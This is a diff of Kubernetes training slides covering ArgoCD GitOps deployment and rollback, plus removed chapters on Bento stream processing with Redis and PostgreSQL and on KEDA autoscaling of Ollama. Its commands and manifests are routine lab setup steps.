Note: `argocd admin dashboard` is similar to `kubectl port-forward` or `kubectl proxy`.
|
||||
|
||||
(The dashboard remains available as long as `argocd admin dashboard` is running.)
|
||||
|
||||
---
|
||||
|
||||
## Adding a staging Application
|
||||
|
||||
- Let's add another Application for a staging environment
|
||||
|
||||
- First, create a new branch (e.g. `staging`) in our kubercoins fork
|
||||
|
||||
- Then, in the ArgoCD web UI, click on the "+ NEW APP" button
|
||||
|
||||
(on a narrow display, it might just be "+", right next to buttons looking like 🔄 and ↩️)
|
||||
|
||||
- See next slides for details about that form!
|
||||
|
||||
---
|
||||
|
||||
## Defining the Application
|
||||
|
||||
| Field | Value |
|
||||
|------------------|--------------------------------------------|
|
||||
| Application Name | `kubercoins-stg` |
|
||||
| Project Name | `default` |
|
||||
| Sync policy | `Manual` |
|
||||
| Sync options | check `auto-create namespace` |
|
||||
| Repository URL | `https://github.com/<username>/<reponame>` |
|
||||
| Revision | `<branchname>` |
|
||||
| Path | `.` |
|
||||
| Cluster URL | `https://kubernetes.default.svc` |
|
||||
| Namespace | `kubercoins-stg` |
|
||||
|
||||
Then click on the "CREATE" button (top left).
|
||||
|
||||
---
|
||||
|
||||
## Synchronizing the Application
|
||||
|
||||
- After creating the app, it should now show up in the app tiles
|
||||
|
||||
(with a yellow outline to indicate that it's out of sync)
|
||||
|
||||
- Click on the "SYNC" button on the app tile to show the sync panel
|
||||
|
||||
- In the sync panel, click on "SYNCHRONIZE"
|
||||
|
||||
- The app will start to synchronize, and should become healthy after a little while
|
||||
|
||||
---
|
||||
|
||||
## Making changes
|
||||
|
||||
- Let's make changes to our application manifests and see what happens
|
||||
|
||||
.lab[
|
||||
|
||||
- Make a change to a manifest
|
||||
|
||||
(for instance, change the number of replicas of a Deployment)
|
||||
|
||||
- Commit that change and push it to the staging branch
|
||||
|
||||
- Check the application sync status:
|
||||
```bash
|
||||
argocd app list
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- After a short period of time (a few minutes max) the app should show up "out of sync"
|
||||
|
||||
---
|
||||
|
||||
## Automated synchronization
|
||||
|
||||
- We don't want to manually sync after every change
|
||||
|
||||
(that wouldn't be true continuous deployment!)
|
||||
|
||||
- We're going to enable "auto sync"
|
||||
|
||||
- Note that this requires much more rigorous testing and observability!
|
||||
|
||||
(we need to be sure that our changes won't crash our app or even our cluster)
|
||||
|
||||
- Argo project also provides [Argo Rollouts][rollouts]
|
||||
|
||||
(a controller and CRDs to provide blue-green, canary deployments...)
|
||||
|
||||
- Today we'll just turn on automated sync for the staging namespace
|
||||
|
||||
---
|
||||
|
||||
## Enabling auto-sync
|
||||
|
||||
- In the web UI, go to *Applications* and click on *kubercoins-stg*
|
||||
|
||||
- Click on the "DETAILS" button (top left, might be just a "i" sign on narrow displays)
|
||||
|
||||
- Click on "ENABLE AUTO-SYNC" (under "SYNC POLICY")
|
||||
|
||||
- After a few minutes the changes should show up!
|
||||
|
||||
---
|
||||
|
||||
## Rolling back
|
||||
|
||||
- If we deploy a broken version, how do we recover?
|
||||
|
||||
- "The GitOps way": revert the changes in source control
|
||||
|
||||
(see next slide)
|
||||
|
||||
- Emergency rollback:
|
||||
|
||||
- disable auto-sync (if it was enabled)
|
||||
|
||||
- on the app page, click on "HISTORY AND ROLLBACK"
|
||||
<br/>
|
||||
(with the clock-with-backward-arrow icon)
|
||||
|
||||
  - click on the "..." button next to the revision we want to roll back to
|
||||
|
||||
- click "Rollback" and confirm
|
||||
|
||||
---
|
||||
|
||||
## Rolling back with GitOps
|
||||
|
||||
- The correct way to roll back is rolling back the code in source control
|
||||
|
||||
```bash
|
||||
git checkout staging
|
||||
git revert HEAD
|
||||
git push origin staging
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Working with Helm
|
||||
|
||||
- ArgoCD supports different tools to process Kubernetes manifests:
|
||||
|
||||
Kustomize, Helm, Jsonnet, and [Config Management Plugins][cmp]
|
||||
|
||||
- Let's see how to deploy Helm charts with ArgoCD!
|
||||
|
||||
- In the [kubercoins] repository, there is a branch called [helm-branch]
|
||||
|
||||
- It provides a generic Helm chart, in the [generic-service] directory
|
||||
|
||||
- There are service-specific values YAML files in the [values] directory
|
||||
|
||||
- Let's create one application for each of the 5 components of our app!
|
||||
|
||||
---
|
||||
|
||||
## Creating a Helm Application
|
||||
|
||||
- The example below uses "upstream" kubercoins
|
||||
|
||||
- Feel free to use your own fork instead!
|
||||
|
||||
.lab[
|
||||
|
||||
- Create an Application for `hasher`:
|
||||
```bash
|
||||
argocd app create hasher \
|
||||
--repo https://github.com/jpetazzo/kubercoins.git \
|
||||
--path generic-service --revision helm \
|
||||
--dest-server https://kubernetes.default.svc \
|
||||
--dest-namespace kubercoins-helm \
|
||||
--sync-option CreateNamespace=true \
|
||||
--values ../values/hasher.yaml \
|
||||
--sync-policy=auto
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the rest of the application
|
||||
|
||||
- Option 1: repeat the previous command (updating app name and values)
|
||||
|
||||
- Option 2: author YAML manifests and apply them
|
||||
|
||||
---
|
||||
|
||||
## Additional considerations
|
||||
|
||||
- When running in production, ArgoCD can be integrated with an [SSO provider][sso]
|
||||
|
||||
- ArgoCD embeds and bundles [Dex] to delegate authentication
|
||||
|
||||
- it can also use an existing OIDC provider (Okta, Keycloak...)
|
||||
|
||||
- A single ArgoCD instance can manage multiple clusters
|
||||
|
||||
(but it's also fine to have one ArgoCD per cluster)
|
||||
|
||||
- ArgoCD can be complemented with [Argo Rollouts][rollouts] for advanced rollout control
|
||||
|
||||
(blue/green, canary...)
|
||||
|
||||
---
|
||||
|
||||
## Acknowledgements
|
||||
|
||||
Many thanks to
|
||||
Anton (Ant) Weiss ([antweiss.com](https://antweiss.com), [@antweiss](https://twitter.com/antweiss))
|
||||
and
|
||||
Guilhem Lettron
|
||||
for contributing an initial version and suggestions to this ArgoCD chapter.
|
||||
|
||||
All remaining typos, mistakes, or approximations are mine (Jérôme Petazzoni).
|
||||
|
||||
[argocd-binaries]: https://github.com/argoproj/argo-cd/releases/latest
|
||||
[argocd-helmchart]: https://artifacthub.io/packages/helm/argo/argocd-apps
|
||||
[argocd-packages]: https://argo-cd.readthedocs.io/en/stable/cli_installation/
|
||||
[cmp]: https://argo-cd.readthedocs.io/en/stable/operator-manual/config-management-plugins/
|
||||
[Dex]: https://github.com/dexidp/dex
|
||||
[generic-service]: https://github.com/jpetazzo/kubercoins/tree/helm/generic-service
|
||||
[helm-branch]: https://github.com/jpetazzo/kubercoins/tree/helm
|
||||
[issue14167]: https://github.com/argoproj/argo-cd/issues/14167
|
||||
[kubercoins]: https://github.com/jpetazzo/kubercoins
|
||||
[pollinginterval]: https://argo-cd.readthedocs.io/en/stable/faq/#how-often-does-argo-cd-check-for-changes-to-my-git-or-helm-repository
|
||||
[rollouts]: https://argoproj.github.io/argo-rollouts/
|
||||
[sso]: https://argo-cd.readthedocs.io/en/stable/operator-manual/user-management/#sso
|
||||
[values]: https://github.com/jpetazzo/kubercoins/tree/helm/values
|
||||
|
||||
???
|
||||
|
||||
:EN:- Implementing gitops with ArgoCD
|
||||
:FR:- Workflow gitops avec ArgoCD
|
||||
@@ -856,7 +856,7 @@ class: extra-details
|
||||
- To learn more about Kubernetes attacks and threat models around RBAC:
|
||||
|
||||
📽️ [Hacking into Kubernetes Security for Beginners](https://www.youtube.com/watch?v=mLsCm9GVIQg)
|
||||
by [V Körbes](https://twitter.com/veekorbes)
|
||||
by [Ellen Körbes](https://twitter.com/ellenkorbes)
|
||||
and [Tabitha Sable](https://twitter.com/TabbySable)
|
||||
|
||||
---
|
||||
|
||||
@@ -1,173 +0,0 @@
|
||||
# Bento & PostgreSQL
|
||||
|
||||
- Bento can also use SQL databases for input/output
|
||||
|
||||
- We're going to demonstrate that by writing to a PostgreSQL database
|
||||
|
||||
- That database will be deployed with the CloudNativePG (Cloud Native PostgreSQL) operator
|
||||
|
||||
(https://cloudnative-pg.io/)
|
||||
|
||||
---
|
||||
|
||||
## CNPG in a nutshell
|
||||
|
||||
- Free, open source
|
||||
|
||||
- Originally created by [EDB] (EnterpriseDB, well-known PgSQL experts)
|
||||
|
||||
- Non-exhaustive list of features:
|
||||
|
||||
- provisioning of Postgres servers, replicas, bouncers
|
||||
|
||||
- automatic failover
|
||||
|
||||
- backups (full backups and WAL shipping)
|
||||
|
||||
- provisioning from scratch, from backups, PITR
|
||||
|
||||
- manual and automated switchover (e.g. for node maintenance)
|
||||
|
||||
- and many more!
|
||||
|
||||
[EDB]: https://www.enterprisedb.com/workload/kubernetes
|
||||
|
||||
---
|
||||
|
||||
## What we're going to do
|
||||
|
||||
1. Install CNPG.
|
||||
|
||||
2. Provision a Postgres cluster.
|
||||
|
||||
3. Configure Bento to write to that cluster.
|
||||
|
||||
4. Set up a Grafana dashboard to see the data.
|
||||
|
||||
---
|
||||
|
||||
## 1️⃣ Installing CNPG
|
||||
|
||||
Many options available, see the [documentation][cnpg-install]:
|
||||
|
||||
- raw YAML manifests
|
||||
|
||||
- kubectl CNPG plugin (`kubectl cnpg install generate`)
|
||||
|
||||
- Helm chart
|
||||
|
||||
- OLM
|
||||
|
||||
[cnpg-install]: https://cloudnative-pg.io/documentation/1.24/installation_upgrade/
|
||||
|
||||
---
|
||||
|
||||
## 2️⃣ Provisioning a Postgres cluster
|
||||
|
||||
Minimal manifest:
|
||||
|
||||
```yaml
|
||||
apiVersion: postgresql.cnpg.io/v1
|
||||
kind: Cluster
|
||||
metadata:
|
||||
name: db
|
||||
spec:
|
||||
storage:
|
||||
size: 1Gi
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## For production...
|
||||
|
||||
We might also add:
|
||||
|
||||
- `spec.monitoring.enablePodMonitor: true`
|
||||
|
||||
- `spec.instances: 2`
|
||||
|
||||
- `resources.{requests,limits}.{cpu,memory}`
|
||||
|
||||
- `walStorage.size`
|
||||
|
||||
- `backup`
|
||||
|
||||
- `postgresql.parameters`
|
||||
|
||||
See [this manifest][cluster-maximal] for a detailed example.
|
||||
|
||||
[cluster-maximal]: https://github.com/jpetazzo/pozok/blob/main/cluster-maximal.yaml
|
||||
|
||||
---
|
||||
|
||||
## 3️⃣ Configuring Bento to write to SQL
|
||||
|
||||
- We'll use the [`sql_insert`][sql-insert] output
|
||||
|
||||
- If our cluster is named `mydb`, there will be a Secret `mydb-app`
|
||||
|
||||
- This Secret will contain a `uri` field
|
||||
|
||||
- That field can be used as the `dsn` in the Bento configuration
|
||||
|
||||
- We will also need to create the table that we want to use
|
||||
|
||||
(see next slide for instructions)
|
||||
|
||||
[sql-insert]: https://warpstreamlabs.github.io/bento/docs/components/outputs/sql_insert
|
||||
|
||||
---
|
||||
|
||||
## Creating a table
|
||||
|
||||
- If we just want to store the city name and its population:
|
||||
```sql
|
||||
CREATE TABLE IF NOT EXISTS cities (
|
||||
city varchar(100) NOT NULL,
|
||||
population integer
|
||||
);
|
||||
```
|
||||
|
||||
- This statement can be executed:
|
||||
|
||||
- manually, by getting a `psql` shell with `kubectl cnpg psql mydb app`
|
||||
|
||||
  - automatically, with Bento's `init_statement`
|
||||
|
||||
---
|
||||
|
||||
## 4️⃣ Viewing the table in Grafana
|
||||
|
||||
- In Grafana, in the home menu on the left, click "Connections"
|
||||
|
||||
- Add a PostgreSQL data source
|
||||
|
||||
- Enter the host:port, database, user, password
|
||||
|
||||
- Then add a visualization using that data source
|
||||
|
||||
(it should be relatively self-explanatory!)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Automating it all
|
||||
|
||||
- Expose PostgreSQL credentials through environment variables
|
||||
|
||||
(in the Bento container)
|
||||
|
||||
- Use the `${...}` syntax in Bento to use these environment variables
|
||||
|
||||
- Export the Grafana dashboard to a JSON file
|
||||
|
||||
- Store the JSON file in a ConfigMap, with label `grafana_dashboard=1`
|
||||
|
||||
- Create that ConfigMap in the namespace where Grafana is running
|
||||
|
||||
- Similarly, data sources (like the Redis and the PostgreSQL one) can be defined in YAML
|
||||
|
||||
- And that YAML can be put in a ConfigMap with label `grafana_datasource=1`
|
||||
@@ -1,450 +0,0 @@
|
||||
# Autoscaling with KEDA
|
||||
|
||||
- Cluster autoscaling = automatically add nodes *when needed*
|
||||
|
||||
- *When needed* = when Pods are `Pending`
|
||||
|
||||
- How do these pods get created?
|
||||
|
||||
- When the Ollama Deployment is scaled up
|
||||
|
||||
- ... manually (e.g. `kubectl scale`)
|
||||
|
||||
- ... automatically (that's what we want to investigate now!)
|
||||
|
||||
---
|
||||
|
||||
## Ways to implement autoscaling
|
||||
|
||||
- Custom code
|
||||
|
||||
(e.g. crontab checking some value every few minutes and scaling accordingly)
|
||||
|
||||
- Kubernetes Horizontal Pod Autoscaler v1
|
||||
|
||||
(aka `kubectl autoscale`)
|
||||
|
||||
- Kubernetes Horizontal Pod Autoscaler v2 with custom metrics
|
||||
|
||||
(e.g. with Prometheus Adapter)
|
||||
|
||||
- Kubernetes Horizontal Pod Autoscaler v2 with external metrics
|
||||
|
||||
(e.g. with KEDA)
|
||||
|
||||
---
|
||||
|
||||
## Custom code
|
||||
|
||||
- No, we're not going to do that!
|
||||
|
||||
- But this would be an interesting exercise in RBAC
|
||||
|
||||
(setting minimal amount of permissions for the pod running our custom code)
|
||||
|
||||
---
|
||||
|
||||
## HPAv1
|
||||
|
||||
Pros: very straightforward
|
||||
|
||||
Cons: can only scale on CPU utilization
|
||||
|
||||
How it works:
|
||||
|
||||
- periodically measures average CPU *utilization* across pods
|
||||
|
||||
- if utilization is above/below a target (default: 80%), scale up/down
|
||||
|
||||
---
|
||||
|
||||
## HPAv1 in practice
|
||||
|
||||
- Create the autoscaling policy:
|
||||
```bash
|
||||
kubectl autoscale deployment ollama --max=1000
|
||||
```
|
||||
(The `--max` is required; it's a safety limit.)
|
||||
|
||||
- Check it:
|
||||
```bash
|
||||
kubectl describe hpa
|
||||
```
|
||||
|
||||
- Send traffic, wait a bit: pods should be created automatically
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 custom vs external
|
||||
|
||||
- Custom metrics = arbitrary metrics attached to Kubernetes objects
|
||||
|
||||
- External metrics = arbitrary metrics not related to Kubernetes objects
|
||||
|
||||
--
|
||||
|
||||
🤔
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 custom metrics
|
||||
|
||||
- Examples:
|
||||
|
||||
- on Pods: CPU, RAM, network traffic...
|
||||
|
||||
- on Ingress: requests per second, HTTP status codes, request duration...
|
||||
|
||||
- on some worker Deployment: number of tasks processed, task duration...
|
||||
|
||||
- Requires an *adapter* to:
|
||||
|
||||
- expose the metrics through the Kubernetes *aggregation layer*
|
||||
|
||||
- map the actual metrics source to Kubernetes objects
|
||||
|
||||
Example: the [Prometheus adapter][prometheus-adapter]
|
||||
|
||||
[prometheus-adapter]: https://github.com/kubernetes-sigs/prometheus-adapter
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 custom metrics in practice
|
||||
|
||||
- We're not going to cover this here
|
||||
|
||||
(too complex / not enough time!)
|
||||
|
||||
- If you want more details, check [my other course material][hpav2slides]
|
||||
|
||||
[hpav2slides]: https://2024-10-enix.container.training/4.yml.html#toc-scaling-with-custom-metrics
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 external metrics
|
||||
|
||||
- Examples:
|
||||
|
||||
- arbitrary Prometheus query
|
||||
|
||||
- arbitrary SQL query
|
||||
|
||||
- number of messages in a queue
|
||||
|
||||
- and [many, many more][keda-scalers]
|
||||
|
||||
- Also requires an extra component to expose the metrics
|
||||
|
||||
Example: [KEDA (https://keda.sh/)](https://keda.sh)
|
||||
|
||||
[keda-scalers]: https://keda.sh/docs/latest/scalers/
|
||||
|
||||
---
|
||||
|
||||
## HPAv2 external metrics in practice
|
||||
|
||||
- We're going to install KEDA
|
||||
|
||||
- And set it up to autoscale depending on the number of messages in Redis
|
||||
|
||||
---
|
||||
|
||||
## Installing KEDA
|
||||
|
||||
Multiple options (details in the [documentation][keda-deploy]):
|
||||
|
||||
- YAML
|
||||
|
||||
- Operator Hub
|
||||
|
||||
- Helm chart 💡
|
||||
|
||||
```bash
|
||||
helm upgrade --install --repo https://kedacore.github.io/charts \
|
||||
--namespace keda-system --create-namespace keda keda
|
||||
```
|
||||
|
||||
[keda-deploy]: https://keda.sh/docs/latest/deploy/
|
||||
|
||||
---
|
||||
|
||||
## Scaling according to Redis
|
||||
|
||||
- We need to create a KEDA Scaler
|
||||
|
||||
- This is done with a "ScaledObject" manifest
|
||||
|
||||
- [Here is the documentation][keda-redis-lists] for the Redis Lists Scaler
|
||||
|
||||
- Let's write that manifest!
|
||||
|
||||
[keda-redis-lists]: https://keda.sh/docs/latest/scalers/redis-lists/
|
||||
|
||||
---
|
||||
|
||||
## `keda-redis-scaler.yaml`
|
||||
|
||||
```yaml
|
||||
apiVersion: keda.sh/v1alpha1
|
||||
kind: ScaledObject
|
||||
metadata:
|
||||
name: ollama
|
||||
spec:
|
||||
scaleTargetRef:
|
||||
name: ollama
|
||||
triggers:
|
||||
- type: redis
|
||||
metadata:
|
||||
address: redis.`default`.svc:6379
|
||||
listName: cities
|
||||
listLength: "10"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Notes
|
||||
|
||||
- We need to update the `address` field with our namespace
|
||||
|
||||
(unless we are running in the `default` namespace)
|
||||
|
||||
- Alternative: use `addressFromEnv` and set an env var in the Ollama pods
|
||||
|
||||
- `listLength` gives the target ratio of `messages / replicas`
|
||||
|
||||
- In our example, KEDA will scale the Deployment to `messages / 10`
|
||||
|
||||
(rounded up!)
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- Apply the ScaledObject manifest
|
||||
|
||||
- Start a Bento pipeline loading e.g. 100-1000 cities in Redis
|
||||
|
||||
(100 on smaller clusters / slower CPUs, 1000 on bigger / faster ones)
|
||||
|
||||
- Check pod and node resource usage
|
||||
|
||||
- What do we see?
|
||||
|
||||
--
|
||||
|
||||
🤩 The Deployment scaled up automatically!
|
||||
|
||||
--
|
||||
|
||||
🤔 But Pod resource usage remains very low (A few busy pods, many idle)
|
||||
|
||||
--
|
||||
|
||||
💡 Bento doesn't submit enough requests in parallel!
|
||||
|
||||
---
|
||||
|
||||
## Improving throughput
|
||||
|
||||
We're going to review multiple techniques:
|
||||
|
||||
1. Increase parallelism inside the Bento pipeline.
|
||||
|
||||
2. Run multiple Bento consumers.
|
||||
|
||||
3. Couple consumers and processors more tightly.
|
||||
|
||||
---
|
||||
|
||||
## 1️⃣ Increase pipeline parallelism
|
||||
|
||||
- Set `parallel` to `true` in the `http` processor
|
||||
|
||||
- Wrap the input around a `batched` input
|
||||
|
||||
(otherwise, we don't have enough messages in flight)
|
||||
|
||||
- Increase `http` timeout significantly (e.g. to 5 minutes)
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
🎉 More messages flow through the pipeline
|
||||
|
||||
🎉 Many requests happen in parallel
|
||||
|
||||
🤔 Average Pod and Node CPU utilization is higher, but not maxed out
|
||||
|
||||
🤔 HTTP queue size (measured with HAProxy metrics) is relatively high
|
||||
|
||||
🤔 Latency is higher too
|
||||
|
||||
Why?
|
||||
|
||||
---
|
||||
|
||||
## Too many requests in parallel
|
||||
|
||||
- Earlier, we didn't have enough...
|
||||
|
||||
- ...Now, we have too many!
|
||||
|
||||
- However, for a very big request queue, it still wouldn't be enough
|
||||
|
||||
💡 We currently have a fixed parallelism. We need to make it dynamic!
|
||||
|
||||
---
|
||||
|
||||
## 2️⃣ Run multiple Bento consumers
|
||||
|
||||
- Restore the original Bento configuration
|
||||
|
||||
(flip `parallel` back to `false`; remove the `batched` input)
|
||||
|
||||
- Run Bento in a Deployment
|
||||
|
||||
(e.g. with the [Bento Helm chart][bento-helm-chart])
|
||||
|
||||
- Autoscale that Deployment like we autoscaled the Ollama Deployment
|
||||
|
||||
[bento-helm-chart]: https://github.com/warpstreamlabs/bento-helm-chart
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
🤔🤔🤔 Pretty much the same as before!
|
||||
|
||||
(High throughput, high utilization but not maxed out, high latency...)
|
||||
|
||||
--
|
||||
|
||||
🤔🤔🤔 Why?
|
||||
|
||||
---
|
||||
|
||||
## Unbalanced load balancing
|
||||
|
||||
- All our requests go through the `ollama` Service
|
||||
|
||||
- We're still using the default Kubernetes service proxy!
|
||||
|
||||
- It doesn't spread the requests properly across all the backends
|
||||
|
||||
---
|
||||
|
||||
## 3️⃣ Couple consumers and processors
|
||||
|
||||
What if:
|
||||
|
||||
--
|
||||
|
||||
instead of sending requests to a load balancer,
|
||||
|
||||
--
|
||||
|
||||
each queue consumer had its own Ollama instance?
|
||||
|
||||
---
|
||||
|
||||
## Current architecture
|
||||
|
||||
<pre class="mermaid">
|
||||
flowchart LR
|
||||
subgraph P1["Pod"]
|
||||
H1["HAProxy"] --> O1["Ollama"]
|
||||
end
|
||||
subgraph P2["Pod"]
|
||||
H2["HAProxy"] --> O2["Ollama"]
|
||||
end
|
||||
subgraph P3["Pod"]
|
||||
H3["HAProxy"] --> O3["Ollama"]
|
||||
end
|
||||
Q["Queue<br/>(Redis)"] <--> C["Consumer<br/>(Bento)"] --> LB["Load Balancer<br/>(kube-proxy)"]
|
||||
LB --> H1 & H2 & H3
|
||||
</pre>
|
||||
|
||||
---
|
||||
|
||||
## Proposed architecture
|
||||
|
||||
<pre class="mermaid">
|
||||
flowchart LR
|
||||
subgraph P1["Consumer Pod"]
|
||||
C1["Bento"] --> H1["HAProxy"] --> O1["Ollama"]
|
||||
end
|
||||
subgraph P2["Consumer Pod"]
|
||||
C2["Bento"] --> H2["HAProxy"] --> O2["Ollama"]
|
||||
end
|
||||
subgraph P3["Consumer Pod"]
|
||||
C3["Bento"] --> H3["HAProxy"] --> O3["Ollama"]
|
||||
end
|
||||
Queue["Queue"] <--> C1 & C2 & C3
|
||||
</pre>
|
||||
|
||||
---
|
||||
|
||||
## 🏗️ Let's build something!
|
||||
|
||||
- Let's implement that architecture!
|
||||
|
||||
- See next slides for hints / getting started
|
||||
|
||||
---
|
||||
|
||||
## Hints
|
||||
|
||||
We need to:
|
||||
|
||||
- Update the Bento consumer configuration to talk to localhost
|
||||
|
||||
- Store that configuration in a ConfigMap
|
||||
|
||||
- Add a Bento container to the Ollama Deployment
|
||||
|
||||
- Profit!
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
🎉 Node and Pod utilization is maximized
|
||||
|
||||
🎉 HTTP queue size is bounded
|
||||
|
||||
🎉 Deployment autoscales up and down
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Scaling down
|
||||
|
||||
- Eventually, there are fewer messages in the queue
|
||||
|
||||
- The HPA scales down the Ollama Deployment
|
||||
|
||||
- This terminates some Ollama Pods
|
||||
|
||||
🤔 What happens if these Pods were processing requests?
|
||||
|
||||
--
|
||||
|
||||
- The requests might be lost!
|
||||
|
||||
---
|
||||
|
||||
## Avoiding lost messages
|
||||
|
||||
Option 1:
|
||||
|
||||
- cleanly shutdown the consumer
|
||||
|
||||
- make sure that Ollama can complete in-flight requests
|
||||
|
||||
(by extending its grace period)
|
||||
|
||||
- find a way to terminate Ollama when no more requests are in flight
|
||||
|
||||
Option 2:
|
||||
|
||||
- use *message acknowledgement*
|
||||
@@ -1,623 +0,0 @@
|
||||
# Getting started with Bento
|
||||
|
||||
How can we move to a message queue architecture...
|
||||
|
||||
*...without rewriting a bunch of code?*
|
||||
|
||||
🤔
|
||||
|
||||
---
|
||||
|
||||
## Bento
|
||||
|
||||
https://bento.dev/
|
||||
|
||||
"Fancy stream processing made operationally mundane"
|
||||
|
||||
"Written in Go, deployed as a static binary, declarative configuration. Open source and cloud native as utter heck."
|
||||
|
||||
With ✨ amazing ✨ documentation 😍
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Tiny bit of history
|
||||
|
||||
- Original project: Benthos
|
||||
|
||||
- May 30, 2024: [Redpanda acquires Benthos][redpanda-acquires-benthos]
|
||||
|
||||
- Benthos is now Redpanda Connect
|
||||
|
||||
- some parts have been relicensed as commercial products
|
||||
|
||||
- May 31, 2024: [Warpstream forks Benthos][warpstream-forks-benthos]
|
||||
|
||||
- that fork is named "Bento"
|
||||
|
||||
- it's fully open source
|
||||
|
||||
- We're going to use Bento here, but Redpanda Connect should work fine too!
|
||||
|
||||
---
|
||||
|
||||
## Bento concepts
|
||||
|
||||
- Message stream processor
|
||||
|
||||
- Each pipeline is configured by a YAML configuration that defines:
|
||||
|
||||
- input (where do we get the messages?)
|
||||
|
||||
- pipeline (optional: how do we transform the messages?)
|
||||
|
||||
- output (where do we put the messages afterwards?)
|
||||
|
||||
- Once Bento is started, it runs the pipelines forever
|
||||
|
||||
(except for pipelines that have a logical end, e.g. reading from a file)
|
||||
|
||||
- Embedded language (Bloblang) to manipulate/transform messages
|
||||
|
||||
---
|
||||
|
||||
## Messages
|
||||
|
||||
- Typically JSON objects
|
||||
|
||||
(but raw strings are also possible)
|
||||
|
||||
- Nesting, arrays, etc. are OK
|
||||
|
||||
---
|
||||
|
||||
## Getting started with Bento
|
||||
|
||||
We're going to:
|
||||
|
||||
1. Import a bunch of cities from a CSV file into a Redis queue.
|
||||
|
||||
2. Read back these cities using a web server.
|
||||
|
||||
3. Use an "enrichment workflow" to query our LLM for each city.
|
||||
|
||||
---
|
||||
|
||||
## 1️⃣ Importing cities
|
||||
|
||||
Let's break down the work:
|
||||
|
||||
- download the data set
|
||||
|
||||
- create the Bento configuration
|
||||
|
||||
- deploy Redis
|
||||
|
||||
- start Bento
|
||||
|
||||
---
|
||||
|
||||
## Downloading the data set
|
||||
|
||||
- Example database:
|
||||
|
||||
https://www.kaggle.com/datasets/juanmah/world-cities
|
||||
|
||||
- Let's download and uncompress the data set:
|
||||
```bash
|
||||
curl -fsSL https://www.kaggle.com/api/v1/datasets/download/juanmah/world-cities |
|
||||
funzip > cities.csv
|
||||
```
|
||||
|
||||
(Ignore the "length error", it's harmless!)
|
||||
|
||||
- Check the structure of the data set:
|
||||
```bash
|
||||
head cities.csv
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Creating the Bento configuration
|
||||
|
||||
- We need to find which `input` and `output` to use
|
||||
|
||||
- Check the list with `bento list` or the [documentation][bento-inputs]
|
||||
|
||||
- Then run `bento create INPUTNAME/PIPELINENAME/OUTPUTNAME`
|
||||
|
||||
- Generate a configuration file:
|
||||
```bash
|
||||
bento create csv//redis_list > csv2redis.yaml
|
||||
```
|
||||
|
||||
- Edit that configuration file; look for the `(required)` parameters
|
||||
|
||||
(Everything else can go away!)
|
||||
|
||||
---
|
||||
|
||||
## Resulting configuration
|
||||
|
||||
If we trim all the default values, here is the result:
|
||||
|
||||
```yaml
|
||||
input:
|
||||
csv:
|
||||
paths: ["cities.csv"]
|
||||
output:
|
||||
redis_list:
|
||||
url: redis://redis:6379 # No default (required)
|
||||
key: cities
|
||||
```
|
||||
|
||||
We'll call that value `csv2redis.yaml`.
|
||||
|
||||
---
|
||||
|
||||
## Deploying Redis
|
||||
|
||||
- Create a Deployment:
|
||||
```bash
|
||||
kubectl create deployment redis --image redis
|
||||
```
|
||||
|
||||
- Expose it:
|
||||
```bash
|
||||
kubectl expose deployment redis --port 6379
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Starting Bento
|
||||
|
||||
Option 1: run it manually in a pod, to see what's going on.
|
||||
|
||||
```bash
|
||||
bento --config csv2redis.yaml
|
||||
```
|
||||
|
||||
Option 2: run it with e.g. the Bento Helm chart.
|
||||
|
||||
*We're not going to do that yet, since this particular pipeline has a logical end.*
|
||||
|
||||
*(The Helm chart is best suited to pipelines that run forever.)*
|
||||
|
||||
---
|
||||
|
||||
## Expected output
|
||||
|
||||
.small[
|
||||
```
|
||||
INFO Running main config from specified file @service=bento bento_version="" path=csv2redis.yaml
|
||||
INFO Launching a Bento instance, use CTRL+C to close @service=bento
|
||||
INFO Listening for HTTP requests at: http://0.0.0.0:4195 @service=bento
|
||||
INFO Input type csv is now active @service=bento label="" path=root.input
|
||||
INFO Output type redis_list is now active @service=bento label="" path=root.output
|
||||
INFO Pipeline has terminated. Shutting down the service @service=bento
|
||||
```
|
||||
]
|
||||
|
||||
The pipeline should complete in just a few seconds.
|
||||
|
||||
---
|
||||
|
||||
## Checking what's in Redis
|
||||
|
||||
- Connect to our Redis instance:
|
||||
```bash
|
||||
redis-cli -h redis
|
||||
```
|
||||
|
||||
- List keys:
|
||||
```redis
|
||||
KEYS *
|
||||
```
|
||||
|
||||
- Check that the `cities` list has approx. 47000 elements:
|
||||
```redis
|
||||
LLEN cities
|
||||
```
|
||||
|
||||
- Get the first element of the list:
|
||||
```redis
|
||||
LINDEX cities 0
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Fun with Bloblang
|
||||
|
||||
- Let's add a filter to keep only cities with a population above 10,000,000
|
||||
|
||||
- Add the following block to the Bento configuration:
|
||||
|
||||
```yaml
|
||||
pipeline:
|
||||
processors:
|
||||
- switch:
|
||||
- check: this.population == ""
|
||||
processors:
|
||||
- mapping: root = deleted()
|
||||
- check: this.population.int64() < 10000000
|
||||
processors:
|
||||
- mapping: root = deleted()
|
||||
```
|
||||
|
||||
(See the [docs][bento-switch] for details about the `switch` processor.)
|
||||
|
||||
---
|
||||
|
||||
## Testing our processor
|
||||
|
||||
- First, delete the existing `cities` list:
|
||||
```bash
|
||||
redis-cli -h redis DEL cities
|
||||
```
|
||||
|
||||
- Then, run the Bento pipeline again:
|
||||
```bash
|
||||
bento --config csv2redis.yaml
|
||||
```
|
||||
(It should complain about a few cities where the population has a decimal point.)
|
||||
|
||||
